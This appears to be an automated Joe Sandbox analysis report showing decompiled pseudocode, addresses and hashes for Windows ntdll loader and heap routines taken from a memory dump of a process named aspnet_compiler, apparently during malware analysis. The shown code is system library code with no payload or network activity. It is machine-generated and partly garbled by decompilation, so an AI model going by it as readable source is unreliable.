                          						_t87 =  *( *[fs:0x30] + 0x1e8);
                          						_t143 = 0;
                          						_v40 = _t161;
                          						_t118 = 0;
                          						_push(_t153);
                          						__eflags = _t87;
                          						if(_t87 != 0) {
                          							_t118 = _t87 + 0x5d8;
                          							__eflags = _t118;
                          							if(_t118 == 0) {
                          								L46:
                          								_t118 = 0;
                          							} else {
                          								__eflags =  *(_t118 + 0x30);
                          								if( *(_t118 + 0x30) == 0) {
                          									goto L46;
                          								}
                          							}
                          						}
                          						_v32 = 0;
                          						_v28 = 0;
                          						_v16 = 0;
                          						_v20 = 0;
                          						_v12 = 0;
                          						__eflags = _t118;
                          						if(_t118 != 0) {
                          							__eflags = _t161;
                          							if(_t161 != 0) {
                          								__eflags =  *(_t118 + 8);
                          								if( *(_t118 + 8) == 0) {
                          									L22:
                          									_t143 = 1;
                          									__eflags = 1;
                          								} else {
                          									_t19 = _t118 + 0x40; // 0x40
                          									_t156 = _t19;
                          									E01408999(_t19,  &_v16);
                          									__eflags = _v0;
                          									if(_v0 != 0) {
                          										__eflags = _v0 - 1;
                          										if(_v0 != 1) {
                          											goto L22;
                          										} else {
                          											_t128 =  *(_t161 + 0x64);
                          											__eflags =  *(_t161 + 0x64);
                          											if( *(_t161 + 0x64) == 0) {
                          												goto L22;
                          											} else {
                          												E01408999(_t128,  &_v12);
                          												_t147 = _v12;
                          												_t91 = 0;
                          												__eflags = 0;
                          												_t129 =  *_t147;
                          												while(1) {
                          													__eflags =  *((intOrPtr*)(0x14e5c60 + _t91 * 8)) - _t129;
                          													if( *((intOrPtr*)(0x14e5c60 + _t91 * 8)) == _t129) {
                          														break;
                          													}
                          													_t91 = _t91 + 1;
                          													__eflags = _t91 - 5;
                          													if(_t91 < 5) {
                          														continue;
                          													} else {
                          														_t131 = 0;
                          														__eflags = 0;
                          													}
                          													L37:
                          													__eflags = _t131;
                          													if(_t131 != 0) {
                          														goto L22;
                          													} else {
                          														__eflags = _v16 - _t147;
                          														if(_v16 != _t147) {
                          															goto L22;
                          														} else {
                          															E01412280(_t92, 0x14e86cc);
                          															_t94 = E014C9DFB( &_v20);
                          															__eflags = _t94 - 1;
                          															if(_t94 != 1) {
                          															}
                          															asm("movsd");
                          															asm("movsd");
                          															asm("movsd");
                          															asm("movsd");
                          															 *_t118 =  *_t118 + 1;
                          															asm("adc dword [ebx+0x4], 0x0");
                          															_t95 = E014261A0( &_v32);
                          															__eflags = _t95;
                          															if(_t95 != 0) {
                          																__eflags = _v32 | _v28;
                          																if((_v32 | _v28) != 0) {
                          																	_t71 = _t118 + 0x40; // 0x3f
                          																	_t134 = _t71;
                          																	goto L55;
                          																}
                          															}
                          															goto L30;
                          														}
                          													}
                          													goto L56;
                          												}
                          												_t92 = 0x14e5c64 + _t91 * 8;
                          												asm("lock xadd [eax], ecx");
                          												_t131 = (_t129 | 0xffffffff) - 1;
                          												goto L37;
                          											}
                          										}
                          										goto L56;
                          									} else {
                          										_t143 = E01408A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                          										__eflags = _t143;
                          										if(_t143 != 0) {
                          											_t157 = _v12;
                          											_t103 = 0;
                          											__eflags = 0;
                          											_t136 =  &(_t157[1]);
                          											 *(_t161 + 0x64) = _t136;
                          											_t151 =  *_t157;
                          											_v20 = _t136;
                          											while(1) {
                          												__eflags =  *((intOrPtr*)(0x14e5c60 + _t103 * 8)) - _t151;
                          												if( *((intOrPtr*)(0x14e5c60 + _t103 * 8)) == _t151) {
                          													break;
                          												}
                          												_t103 = _t103 + 1;
                          												__eflags = _t103 - 5;
                          												if(_t103 < 5) {
                          													continue;
                          												}
                          												L21:
                          												_t105 = E0143F380(_t136, 0x13d1184, 0x10);
                          												__eflags = _t105;
                          												if(_t105 != 0) {
                          													__eflags =  *_t157 -  *_v16;
                          													if( *_t157 >=  *_v16) {
                          														goto L22;
                          													} else {
                          														asm("cdq");
                          														_t166 = _t157[5] & 0x0000ffff;
                          														_t108 = _t157[5] & 0x0000ffff;
                          														asm("cdq");
                          														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                          														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                          														if(__eflags > 0) {
                          															L29:
                          															E01412280(_t108, 0x14e86cc);
                          															 *_t118 =  *_t118 + 1;
                          															_t42 = _t118 + 0x40; // 0x3f
                          															_t156 = _t42;
                          															asm("adc dword [ebx+0x4], 0x0");
                          															asm("movsd");
                          															asm("movsd");
                          															asm("movsd");
                          															asm("movsd");
                          															_t110 = E014261A0( &_v32);
                          															__eflags = _t110;
                          															if(_t110 != 0) {
                          																__eflags = _v32 | _v28;
                          																if((_v32 | _v28) != 0) {
                          																	_t134 = _v20;
                          																	L55:
                          																	E014C9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                          																}
                          															}
                          															L30:
                          															 *_t118 =  *_t118 + 1;
                          															asm("adc dword [ebx+0x4], 0x0");
                          															E0140FFB0(_t118, _t156, 0x14e86cc);
                          															goto L22;
                          														} else {
                          															if(__eflags < 0) {
                          																goto L22;
                          															} else {
                          																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                          																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                          																	goto L22;
                          																} else {
                          																	goto L29;
                          																}
                          															}
                          														}
                          													}
                          													goto L56;
                          												}
                          												goto L22;
                          											}
                          											asm("lock inc dword [eax]");
                          											goto L21;
                          										}
                          									}
                          								}
                          							}
                          						}
                          						return _t143;
                          					}
                          				} else {
                          					_push( &_v8);
                          					_push( *((intOrPtr*)(__ecx + 0x50)));
                          					_push(__ecx + 0x40);
                          					_push(_t121);
                          					_push(0xffffffff);
                          					_t80 = E01439A00();
                          					_t159 = _t80;
                          					if(_t159 < 0) {
                          						L8:
                          						return _t80;
                          					} else {
                          						goto L2;
                          					}
                          				}
                          				L56:
                          			}












































                          0x01408799
                          0x0140879d
                          0x014087a1
                          0x014087a3
                          0x014087a8
                          0x014087c3
                          0x014087c3
                          0x014087c8
                          0x014087d1
                          0x014087d4
                          0x014087d8
                          0x014087e5
                          0x014087ec
                          0x01459bfe
                          0x01459c00
                          0x01459c02
                          0x01459c08
                          0x01459c0d
                          0x01459c0f
                          0x01459c14
                          0x01459c2d
                          0x01459c32
                          0x01459c37
                          0x01459c3a
                          0x01459c3c
                          0x01459c42
                          0x01459c42
                          0x01459c3c
                          0x01459c02
                          0x014087da
                          0x014087df
                          0x014087e3
                          0x00000000
                          0x00000000
                          0x014087e3
                          0x014087f2
                          0x00000000
                          0x014087fb
                          0x014087fd
                          0x014087fe
                          0x0140880e
                          0x0140880f
                          0x01408810
                          0x01408814
                          0x0140881a
                          0x0140881c
                          0x0140881f
                          0x01408821
                          0x01408822
                          0x01408824
                          0x01408826
                          0x0140882c
                          0x0140882e
                          0x01459c48
                          0x01459c48
                          0x01408834
                          0x01408834
                          0x01408837
                          0x00000000
                          0x00000000
                          0x01408837
                          0x0140882e
                          0x0140883d
                          0x01408840
                          0x01408843
                          0x01408846
                          0x01408849
                          0x0140884c
                          0x0140884e
                          0x01408850
                          0x01408852
                          0x01408854
                          0x01408857
                          0x014088b4
                          0x014088b6
                          0x014088b6
                          0x01408859
                          0x01408859
                          0x01408859
                          0x01408861
                          0x01408866
                          0x0140886a
                          0x0140893d
                          0x01408941
                          0x00000000
                          0x01408947
                          0x01408947
                          0x0140894a
                          0x0140894c
                          0x00000000
                          0x01408952
                          0x01408955
                          0x0140895a
                          0x0140895d
                          0x0140895d
                          0x0140895f
                          0x01408961
                          0x01408961
                          0x01408968
                          0x00000000
                          0x00000000
                          0x0140896a
                          0x0140896b
                          0x0140896e
                          0x00000000
                          0x01408970
                          0x01408970
                          0x01408970
                          0x01408970
                          0x01408972
                          0x01408972
                          0x01408974
                          0x00000000
                          0x0140897a
                          0x0140897a
                          0x0140897d
                          0x00000000
                          0x01408983
                          0x01459c65
                          0x01459c6d
                          0x01459c72
                          0x01459c75
                          0x01459c75
                          0x01459c82
                          0x01459c86
                          0x01459c87
                          0x01459c88
                          0x01459c89
                          0x01459c8c
                          0x01459c90
                          0x01459c95
                          0x01459c97
                          0x01459ca0
                          0x01459ca3
                          0x01459ca9
                          0x01459ca9
                          0x00000000
                          0x01459ca9
                          0x01459ca3
                          0x00000000
                          0x01459c97
                          0x0140897d
                          0x00000000
                          0x01408974
                          0x01408988
                          0x01408992
                          0x01408996
                          0x00000000
                          0x01408996
                          0x0140894c
                          0x00000000
                          0x01408870
                          0x0140887b
                          0x0140887d
                          0x0140887f
                          0x01408881
                          0x01408884
                          0x01408884
                          0x01408886
                          0x01408889
                          0x0140888c
                          0x0140888e
                          0x01408891
                          0x01408891
                          0x01408898
                          0x00000000
                          0x00000000
                          0x0140889a
                          0x0140889b
                          0x0140889e
                          0x00000000
                          0x00000000
                          0x014088a0
                          0x014088a8
                          0x014088b0
                          0x014088b2
                          0x014088d3
                          0x014088d5
                          0x00000000
                          0x014088d7
                          0x014088db
                          0x014088dc
                          0x014088e0
                          0x014088e8
                          0x014088ee
                          0x014088f0
                          0x014088f3
                          0x014088fc
                          0x01408901
                          0x01408906
                          0x0140890c
                          0x0140890c
                          0x0140890f
                          0x01408916
                          0x01408917
                          0x01408918
                          0x01408919
                          0x0140891a
                          0x0140891f
                          0x01408921
                          0x01459c52
                          0x01459c55
                          0x01459c5b
                          0x01459cac
                          0x01459cc0
                          0x01459cc0
                          0x01459c55
                          0x01408927
                          0x01408927
                          0x0140892f
                          0x01408933
                          0x00000000
                          0x014088f5
                          0x014088f5
                          0x00000000
                          0x014088f7
                          0x014088f7
                          0x014088fa
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014088fa
                          0x014088f5
                          0x014088f3
                          0x00000000
                          0x014088d5
                          0x00000000
                          0x014088b2
                          0x014088c9
                          0x00000000
                          0x014088c9
                          0x0140887f
                          0x0140886a
                          0x01408857
                          0x01408852
                          0x014088bf
                          0x014088bf
                          0x014087aa
                          0x014087ad
                          0x014087ae
                          0x014087b4
                          0x014087b5
                          0x014087b6
                          0x014087b8
                          0x014087bd
                          0x014087c1
                          0x014087f4
                          0x014087fa
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014087c1
                          0x00000000

                          Strings
                          • minkernel\ntdll\ldrsnap.c, xrefs: 01459C28
                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01459C18
                          • LdrpDoPostSnapWork, xrefs: 01459C1E
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                          • API String ID: 2994545307-1948996284
                          • Opcode ID: 7e285e899fef64d4f0eeef113b3b674e7b6a5f3c6555e28a19dee0decb900b3f
                          • Instruction ID: 9cc6d070637208a263c1e0a8e9ddb6ba67a94b5db794319683449a09612839f3
                          • Opcode Fuzzy Hash: 7e285e899fef64d4f0eeef113b3b674e7b6a5f3c6555e28a19dee0decb900b3f
                          • Instruction Fuzzy Hash: 9A91F432E00217DBEB1ADF5AD9809BA77B5FF94314B14417FD905AB2B6D730AA01CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 80%
                          			E0142AC7B(void* __ecx, signed short* __edx) {
                          				signed int _v8;
                          				signed int _v12;
                          				void* __ebx;
                          				signed char _t75;
                          				signed int _t79;
                          				signed int _t88;
                          				intOrPtr _t89;
                          				signed int _t96;
                          				signed char* _t97;
                          				intOrPtr _t98;
                          				signed int _t101;
                          				signed char* _t102;
                          				intOrPtr _t103;
                          				signed int _t105;
                          				signed char* _t106;
                          				signed int _t131;
                          				signed int _t138;
                          				void* _t149;
                          				signed short* _t150;
                          
                          				_t150 = __edx;
                          				_t149 = __ecx;
                          				_t70 =  *__edx & 0x0000ffff;
                          				__edx[1] = __edx[1] & 0x000000f8;
                          				__edx[3] = 0;
                          				_v8 =  *__edx & 0x0000ffff;
                          				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
                          					_t39 =  &(_t150[8]); // 0x8
                          					E0144D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
                          					__edx[1] = __edx[1] | 0x00000004;
                          				}
                          				_t75 =  *(_t149 + 0xcc) ^  *0x14e8a68;
                          				if(_t75 != 0) {
                          					L4:
                          					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
                          						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
                          						_t79 =  *(_t149 + 0x50);
                          						 *_t150 =  *_t150 ^ _t79;
                          						return _t79;
                          					}
                          					return _t75;
                          				} else {
                          					_t9 =  &(_t150[0x80f]); // 0x1017
                          					_t138 = _t9 & 0xfffff000;
                          					_t10 =  &(_t150[0x14]); // 0x20
                          					_v12 = _t138;
                          					if(_t138 == _t10) {
                          						_t138 = _t138 + 0x1000;
                          						_v12 = _t138;
                          					}
                          					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
                          					if(_t75 > _t138) {
                          						_v8 = _t75 - _t138;
                          						_push(0x4000);
                          						_push( &_v8);
                          						_push( &_v12);
                          						_push(0xffffffff);
                          						_t131 = E014396E0();
                          						__eflags = _t131 - 0xc0000045;
                          						if(_t131 == 0xc0000045) {
                          							_t88 = E014A3C60(_v12, _v8);
                          							__eflags = _t88;
                          							if(_t88 != 0) {
                          								_push(0x4000);
                          								_push( &_v8);
                          								_push( &_v12);
                          								_push(0xffffffff);
                          								_t131 = E014396E0();
                          							}
                          						}
                          						_t89 =  *[fs:0x30];
                          						__eflags = _t131;
                          						if(_t131 < 0) {
                          							__eflags =  *(_t89 + 0xc);
                          							if( *(_t89 + 0xc) == 0) {
                          								_push("HEAP: ");
                          								E013FB150();
                          							} else {
                          								E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          							}
                          							_push(_v8);
                          							_push(_v12);
                          							_push(_t149);
                          							_t75 = E013FB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
                          							goto L4;
                          						} else {
                          							_t96 =  *(_t89 + 0x50);
                          							_t132 = 0x7ffe0380;
                          							__eflags = _t96;
                          							if(_t96 != 0) {
                          								__eflags =  *_t96;
                          								if( *_t96 == 0) {
                          									goto L10;
                          								}
                          								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
                          								L11:
                          								__eflags =  *_t97;
                          								if( *_t97 != 0) {
                          									_t98 =  *[fs:0x30];
                          									__eflags =  *(_t98 + 0x240) & 0x00000001;
                          									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
                          										E014B14FB(_t132, _t149, _v12, _v8, 7);
                          									}
                          								}
                          								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
                          								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
                          								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
                          								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
                          								_t101 =  *( *[fs:0x30] + 0x50);
                          								__eflags = _t101;
                          								if(_t101 != 0) {
                          									__eflags =  *_t101;
                          									if( *_t101 == 0) {
                          										goto L13;
                          									}
                          									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
                          									goto L14;
                          								} else {
                          									L13:
                          									_t102 = _t132;
                          									L14:
                          									__eflags =  *_t102;
                          									if( *_t102 != 0) {
                          										_t103 =  *[fs:0x30];
                          										__eflags =  *(_t103 + 0x240) & 0x00000001;
                          										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
                          											__eflags = E01417D50();
                          											if(__eflags != 0) {
                          												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
                          												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
                          											}
                          											E014B1411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
                          										}
                          									}
                          									_t133 = 0x7ffe038a;
                          									_t105 =  *( *[fs:0x30] + 0x50);
                          									__eflags = _t105;
                          									if(_t105 != 0) {
                          										__eflags =  *_t105;
                          										if( *_t105 == 0) {
                          											goto L16;
                          										}
                          										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
                          										goto L17;
                          									} else {
                          										L16:
                          										_t106 = _t133;
                          										L17:
                          										__eflags =  *_t106;
                          										if( *_t106 != 0) {
                          											__eflags = E01417D50();
                          											if(__eflags != 0) {
                          												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
                          												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
                          											}
                          											E014B1411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
                          										}
                          										_t75 = _t150[1] & 0x00000013 | 0x00000008;
                          										_t150[1] = _t75;
                          										goto L4;
                          									}
                          								}
                          							}
                          							L10:
                          							_t97 = _t132;
                          							goto L11;
                          						}
                          					} else {
                          						goto L4;
                          					}
                          				}
                          			}






















                          0x0142ac85
                          0x0142ac88
                          0x0142ac8a
                          0x0142ac8d
                          0x0142ac91
                          0x0142ac99
                          0x0142ac9c
                          0x01469f57
                          0x01469f5b
                          0x01469f60
                          0x01469f60
                          0x0142aca8
                          0x0142acae
                          0x0142acda
                          0x0142acde
                          0x0142ace8
                          0x0142aceb
                          0x0142acee
                          0x00000000
                          0x0142acee
                          0x0142acf6
                          0x0142acb0
                          0x0142acb0
                          0x0142acbb
                          0x0142acbd
                          0x0142acc0
                          0x0142acc5
                          0x0142adae
                          0x0142adb4
                          0x0142adb4
                          0x0142acd4
                          0x0142acd8
                          0x0142acf9
                          0x0142acff
                          0x0142ad04
                          0x0142ad08
                          0x0142ad09
                          0x0142ad10
                          0x0142ad12
                          0x0142ad18
                          0x01469f6f
                          0x01469f74
                          0x01469f76
                          0x01469f7c
                          0x01469f84
                          0x01469f88
                          0x01469f89
                          0x01469f90
                          0x01469f90
                          0x01469f76
                          0x0142ad1e
                          0x0142ad24
                          0x0142ad26
                          0x0146a097
                          0x0146a09b
                          0x0146a0ba
                          0x0146a0bf
                          0x0146a09d
                          0x0146a0b2
                          0x0146a0b7
                          0x0146a0c5
                          0x0146a0c8
                          0x0146a0cb
                          0x0146a0d2
                          0x00000000
                          0x0142ad2c
                          0x0142ad2c
                          0x0142ad2f
                          0x0142ad34
                          0x0142ad36
                          0x01469f97
                          0x01469f9a
                          0x00000000
                          0x00000000
                          0x01469fa9
                          0x0142ad3e
                          0x0142ad3e
                          0x0142ad41
                          0x01469fb3
                          0x01469fb9
                          0x01469fc0
                          0x01469fd0
                          0x01469fd0
                          0x01469fc0
                          0x0142ad4a
                          0x0142ad50
                          0x0142ad5c
                          0x0142ad62
                          0x0142ad68
                          0x0142ad6b
                          0x0142ad6d
                          0x01469fda
                          0x01469fdd
                          0x00000000
                          0x00000000
                          0x01469fec
                          0x00000000
                          0x0142ad73
                          0x0142ad73
                          0x0142ad73
                          0x0142ad75
                          0x0142ad75
                          0x0142ad78
                          0x01469ff6
                          0x01469ffc
                          0x0146a003
                          0x0146a00e
                          0x0146a010
                          0x0146a01b
                          0x0146a01b
                          0x0146a01b
                          0x0146a038
                          0x0146a038
                          0x0146a003
                          0x0142ad84
                          0x0142ad89
                          0x0142ad8c
                          0x0142ad8e
                          0x0146a042
                          0x0146a045
                          0x00000000
                          0x00000000
                          0x0146a054
                          0x00000000
                          0x0142ad94
                          0x0142ad94
                          0x0142ad94
                          0x0142ad96
                          0x0142ad96
                          0x0142ad99
                          0x0146a063
                          0x0146a065
                          0x0146a070
                          0x0146a070
                          0x0146a070
                          0x0146a08d
                          0x0146a08d
                          0x0142ada4
                          0x0142ada6
                          0x00000000
                          0x0142ada6
                          0x0142ad8e
                          0x0142ad6d
                          0x0142ad3c
                          0x0142ad3c
                          0x00000000
                          0x0142ad3c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0142acd8

                          Strings
                          • HEAP: , xrefs: 0146A0BA
                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0146A0CD
                          • HEAP[%wZ]: , xrefs: 0146A0AD
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                          • API String ID: 0-1340214556
                          • Opcode ID: 2972c6ce02e1c00f43c70d5adaf69ce4033dcf057822dee2f3e39a8b45f324e7
                          • Instruction ID: 3e39b7bf46a90ad0b24f8422c702eafa4b748d9323ec196c33b379403f542052
                          • Opcode Fuzzy Hash: 2972c6ce02e1c00f43c70d5adaf69ce4033dcf057822dee2f3e39a8b45f324e7
                          • Instruction Fuzzy Hash: 5C811771200A55EFE726CB68C894BAABBF8FF04714F1401A6E951877B2D774E981CB11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 74%
                          			E0141B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
                          				signed int _v8;
                          				char _v12;
                          				void* __ebx;
                          				void* __edi;
                          				void* __ebp;
                          				void* _t72;
                          				char _t76;
                          				signed char _t77;
                          				intOrPtr* _t80;
                          				unsigned int _t85;
                          				signed int* _t86;
                          				signed int _t88;
                          				signed char _t89;
                          				intOrPtr _t90;
                          				intOrPtr _t101;
                          				intOrPtr* _t111;
                          				void* _t117;
                          				intOrPtr* _t118;
                          				signed int _t120;
                          				signed char _t121;
                          				intOrPtr* _t123;
                          				signed int _t126;
                          				intOrPtr _t136;
                          				signed int _t139;
                          				void* _t140;
                          				signed int _t141;
                          				void* _t147;
                          
                          				_t111 = _a4;
                          				_t140 = __ecx;
                          				_v8 = __edx;
                          				_t3 = _t111 + 0x18; // 0x0
                          				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
                          				_t5 = _t111 - 8; // -32
                          				_t141 = _t5;
                          				 *(_t111 + 0x14) = _a8;
                          				_t72 = 4;
                          				 *(_t141 + 2) = 1;
                          				 *_t141 = _t72;
                          				 *((char*)(_t141 + 7)) = 3;
                          				_t134 =  *((intOrPtr*)(__edx + 0x18));
                          				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
                          					_t76 = (_t141 - __edx >> 0x10) + 1;
                          					_v12 = _t76;
                          					__eflags = _t76 - 0xfe;
                          					if(_t76 >= 0xfe) {
                          						_push(__edx);
                          						_push(0);
                          						E014BA80D(_t134, 3, _t141, __edx);
                          						_t76 = _v12;
                          					}
                          				} else {
                          					_t76 = 0;
                          				}
                          				 *((char*)(_t141 + 6)) = _t76;
                          				if( *0x14e8748 >= 1) {
                          					__eflags = _a12 - _t141;
                          					if(_a12 <= _t141) {
                          						goto L4;
                          					}
                          					_t101 =  *[fs:0x30];
                          					__eflags =  *(_t101 + 0xc);
                          					if( *(_t101 + 0xc) == 0) {
                          						_push("HEAP: ");
                          						E013FB150();
                          					} else {
                          						E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          					}
                          					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
                          					E013FB150();
                          					__eflags =  *0x14e7bc8;
                          					if(__eflags == 0) {
                          						E014B2073(_t111, 1, _t140, __eflags);
                          					}
                          					goto L3;
                          				} else {
                          					L3:
                          					_t147 = _a12 - _t141;
                          					L4:
                          					if(_t147 != 0) {
                          						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
                          					}
                          					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
                          						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
                          						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
                          					}
                          					_t135 =  *(_t111 + 0x14);
                          					if( *(_t111 + 0x14) == 0) {
                          						L12:
                          						_t77 =  *((intOrPtr*)(_t141 + 6));
                          						if(_t77 != 0) {
                          							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
                          						} else {
                          							_t117 = _t140;
                          						}
                          						_t118 = _t117 + 0x38;
                          						_t26 = _t111 + 8; // -16
                          						_t80 = _t26;
                          						_t136 =  *_t118;
                          						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
                          							_push(_t118);
                          							_push(0);
                          							E014BA80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
                          						} else {
                          							 *_t80 = _t136;
                          							 *((intOrPtr*)(_t80 + 4)) = _t118;
                          							 *((intOrPtr*)(_t136 + 4)) = _t80;
                          							 *_t118 = _t80;
                          						}
                          						_t120 = _v8;
                          						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
                          						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
                          						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
                          						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
                          						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
                          							__eflags =  *(_t140 + 0xb8);
                          							if( *(_t140 + 0xb8) == 0) {
                          								_t88 =  *(_t140 + 0x40) & 0x00000003;
                          								__eflags = _t88 - 2;
                          								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
                          								__eflags =  *0x14e8720 & 0x00000001;
                          								_t89 = _t88 & 0xffffff00 | ( *0x14e8720 & 0x00000001) == 0x00000000;
                          								__eflags = _t89 & _t121;
                          								if((_t89 & _t121) != 0) {
                          									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
                          								}
                          							}
                          						}
                          						_t85 =  *(_t111 + 0x14);
                          						if(_t85 >= 0x7f000) {
                          							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
                          						}
                          						_t86 = _a16;
                          						 *_t86 = _t141 - _a12 >> 3;
                          						return _t86;
                          					} else {
                          						_t90 = E0141B8E4(_t135);
                          						_t123 =  *((intOrPtr*)(_t90 + 4));
                          						if( *_t123 != _t90) {
                          							_push(_t123);
                          							_push( *_t123);
                          							E014BA80D(0, 0xd, _t90, 0);
                          						} else {
                          							 *_t111 = _t90;
                          							 *((intOrPtr*)(_t111 + 4)) = _t123;
                          							 *_t123 = _t111;
                          							 *((intOrPtr*)(_t90 + 4)) = _t111;
                          						}
                          						_t139 =  *(_t140 + 0xb8);
                          						if(_t139 != 0) {
                          							_t93 =  *(_t111 + 0x14) >> 0xc;
                          							__eflags = _t93;
                          							while(1) {
                          								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
                          								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
                          									break;
                          								}
                          								_t126 =  *_t139;
                          								__eflags = _t126;
                          								if(_t126 != 0) {
                          									_t139 = _t126;
                          									continue;
                          								}
                          								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
                          								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
                          								break;
                          							}
                          							E0141E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
                          						}
                          						goto L12;
                          					}
                          				}
                          			}






























                          0x0141b746
                          0x0141b74b
                          0x0141b74d
                          0x0141b750
                          0x0141b755
                          0x0141b758
                          0x0141b758
                          0x0141b75e
                          0x0141b763
                          0x0141b764
                          0x0141b76a
                          0x0141b76d
                          0x0141b771
                          0x0141b776
                          0x0141b85c
                          0x0141b85d
                          0x0141b860
                          0x0141b865
                          0x01462ba1
                          0x01462ba2
                          0x01462ba9
                          0x01462bae
                          0x01462bae
                          0x0141b77c
                          0x0141b77c
                          0x0141b77c
                          0x0141b785
                          0x0141b788
                          0x01462bb6
                          0x01462bb9
                          0x00000000
                          0x00000000
                          0x01462bbf
                          0x01462bc5
                          0x01462bc9
                          0x01462be8
                          0x01462bed
                          0x01462bcb
                          0x01462be0
                          0x01462be5
                          0x01462bf3
                          0x01462bf8
                          0x01462bfd
                          0x01462c05
                          0x01462c0e
                          0x01462c0e
                          0x00000000
                          0x0141b78e
                          0x0141b78e
                          0x0141b78e
                          0x0141b791
                          0x0141b791
                          0x0141b797
                          0x0141b797
                          0x0141b79f
                          0x0141b7a9
                          0x0141b7af
                          0x0141b7af
                          0x0141b7b1
                          0x0141b7b6
                          0x0141b7e2
                          0x0141b7e2
                          0x0141b7e7
                          0x0141b880
                          0x0141b7ed
                          0x0141b7ed
                          0x0141b7ed
                          0x0141b7ef
                          0x0141b7f2
                          0x0141b7f2
                          0x0141b7f5
                          0x0141b7fa
                          0x01462c2d
                          0x01462c2e
                          0x01462c39
